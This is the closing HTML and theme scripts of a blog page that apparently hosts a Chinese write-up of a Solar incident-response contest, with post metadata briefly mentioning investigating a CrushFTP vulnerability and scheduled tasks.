        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "mX1@0",
          title: "solar应急响应月赛（5月）",
          url: "http://example.com/2025/06/01/solar-ying-ji-xiang-ying-yue-sai-5-yue/",
          excerpt: "",
          description: "",
          stripContent: "solar应急响应月赛（5月）1 攻击者使用什么漏洞获取了服务器的配置文件？ 题目描述：某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器，flag格式为：flag{CVE-2020-12345}  查看Administrator的桌面，存在CrushFTP  搜CrushFTP近期CVE漏洞  2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那？ 题目描述：flag为配置名称（无空格）   可能的原因分析  计划任务（Task Scheduler） ",
          date: "Sun Jun 01 2025 22:37:43 GMT+0800",
          updated: "Mon Jun 02 2025 00:11:10 GMT+0800",
          cover: "/images/%E7%8E%9B%E8%8E%8E%E6%8B%89%E8%92%82.jpg",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      
        








      
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.9.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>









    
  </body>
  </html>

